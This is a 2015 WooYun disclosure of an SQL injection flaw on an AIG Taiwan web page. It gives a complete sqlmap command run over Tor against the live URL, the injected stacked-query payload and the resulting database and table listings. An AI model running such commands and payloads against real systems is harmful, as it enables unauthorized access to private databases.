当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121913

漏洞标题:美国AIG保险台湾分公司分站SQL注入

相关厂商:台湾美亞產物保險

漏洞作者: 路人甲

提交时间:2015-06-21 11:38

修复时间:2015-08-07 05:36

公开时间:2015-08-07 05:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-21: 细节已通知厂商并且等待厂商处理中
2015-06-23: 厂商已经确认,细节仅向厂商公开
2015-07-03: 细节向核心白帽子及相关领域专家公开
2015-07-13: 细节向普通白帽子公开
2015-07-23: 细节向实习白帽子公开
2015-08-07: 细节向公众公开

简要描述:

美国AIG保险台湾分公司分站SQL注入

详细说明:

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=15 --technique=B --union-char=n -u "https://www-401.aig.com.tw/ns/Activitie
sQuery.aspx" --data="__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=wg3G2%2Bu6KC%2B146U%2Fe9%2BUBpS%2BgEJhmVOnFnG4ypiFhmCo5c1TGbBy7Y7s43eo0BX8nu%2BgUh1AY%2B15R1yBAQ479btXvw1q4QLuAj%2B1p1AwCDypy9arvnXL%2BU0gWdIFJj1i6Zsuo%2FwhrKNuJjRN1t9xB08C4dERvmpoBpEjOPUXBAHDl6ORRrxkmHih8pB7y7AE&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=MFWIggjoXJ%2BeYh9sNebw1JMXHxxRDX5BInViCqUAQ7d3jOUj8AmNi9RB6sb9eVGy&ctl00%24ContentPlaceHolder1%24txtUserID=A180193569&ctl00%24ContentPlaceHolder1%24txtUserBirth=1970%2F01%2F01&ctl00%24ContentPlaceHolder1%24btnSubmit=%E7%A2%BA%E5%AE%9A" --dbs --threads=2
---
Parameter: ctl00$ContentPlaceHolder1$txtUserID (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=wg3G2+u6KC+146U/e9+UBpS+gEJhmVOnFnG4ypiFhmCo5c1TGbBy7Y7s43eo0BX8nu+gUh1AY+15R1yBAQ479btXvw1q4QLuAj+1p1AwCDypy9arvnXL+U0gWdIFJj1i6Zsuo/whrKNuJjRN1t9xB08C4dERvmpoBpEjOPUXBAHDl6ORRrxkmHih8pB7y7AE&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=MFWIggjoXJ+eYh9sNebw1JMXHxxRDX5BInViCqUAQ7d3jOUj8AmNi9RB6sb9eVGy&ctl00$ContentPlaceHolder1$txtUserID=A180193569';IF(1942=1942) SELECT 1942 ELSE DROP FUNCTION mkvG--&ctl00$ContentPlaceHolder1$txtUserBirth=1970/01/01&ctl00$ContentPlaceHolder1$btnSubmit=%E7%A2%BA%E5%AE%9A
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

漏洞证明:

available databases [10]:
[*] AuditDB
[*] chartis
[*] eLearning
[*] elearningM  ===>可能只影响这个数据库
[*] master
[*] Messaging
[*] model
[*] msdb
[*] SMS
[*] tempdb
current user is DBA:    False===>非DBA
[03:00:49] [INFO] fetching number of tables for database 'elearningM'
[03:00:49] [INFO] retrieved: 124
[03:01:31] [INFO] retrieving the length of query output
[03:01:31] [INFO] retrieved: 16
[03:03:09] [INFO] retrieved: dbo.ActiveDetail             
[03:03:09] [INFO] retrieving the length of query output
[03:03:09] [INFO] retrieved: 14
[03:04:47] [INFO] retrieved: dbo.Activities             
[03:04:47] [INFO] retrieving the length of query output
[03:04:47] [INFO] retrieved: 16
[03:06:28] [INFO] retrieved: dbo.CBC_feedback             
[03:06:28] [INFO] retrieving the length of query output
[03:06:28] [INFO] retrieved: 19
[03:08:33] [INFO] retrieved: dbo.CBC_feedback_wk             
[03:08:33] [INFO] retrieving the length of query output
[03:08:33] [INFO] retrieved: 10
[03:09:47] [INFO] retrieved: dbo.CGroup             
[03:09:47] [INFO] retrieving the length of query output
[03:09:47] [INFO] retrieved: 16
[03:11:17] [INFO] retrieved: dbo.CmemberGroup             
[03:11:17] [INFO] retrieving the length of query output
[03:11:17] [INFO] retrieved: 11
[03:12:24] [INFO] retrieved: dbo.Cs_empl             
[03:12:24] [INFO] retrieving the length of query output
[03:12:24] [INFO] retrieved: 9
[03:13:26] [INFO] retrieved: dbo.Cuser           ===>可能是用户表
[03:13:27] [INFO] waiting for threads to finish (Ctrl+C was pressed)
[03:13:27] [CRITICAL] user aborted (Ctrl+C was pressed multiple times)
===>太慢,不继续了


BTW: 仅证明漏洞存在,未dump任何用户资讯

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-23 05:34

厂商回复:

感謝通報

最新状态:

暂无